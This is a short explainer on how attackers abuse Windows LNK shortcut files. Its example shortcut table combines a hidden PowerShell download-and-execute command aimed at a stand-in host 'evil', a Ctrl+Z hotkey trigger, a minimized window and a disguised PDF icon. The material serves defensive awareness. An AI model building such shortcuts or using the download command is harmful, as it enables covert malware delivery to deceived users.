LNK files are Windows shortcuts that point to files, folders, or executables. They’re created automatically (like for recent documents) or manually by users—and are often abused by attackers for Initial Access or Persistence.
Default location:
C:\\Users\\$USER$\\AppData\\Roaming\\Microsoft\\Windows\\Recent
User-created:
Can exist anywhere (e.g. Desktop, Startup folder, Downloads)

TargetPath + Arguments (e.g. powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "…")HotKey combo (e.g. Ctrl+Z)WindowStyle (Normal / Minimized / Maximized)IconLocation (plus icon-related ExtraData)AcroRd32.exe,0) to look benign.
A single .lnk embedding all four tricks:
| Field | Value |
|---|---|
| Target | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('<http://evil/payload.ps1>')" |
| HotKey | Ctrl + Z |
| Run | Minimized |
| Icon | C:\\Program Files\\Adobe\\Reader\\AcroRd32.exe,0 (PDF icon) |
When the victim presses Ctrl +Z (or double-clicks the shortcut), Explorer launches PowerShell in a hidden/minimized window, which then fetches and executes the malicious script from the attacker’s server—while the PDF icon and familiar hotkey keep the user unsuspecting.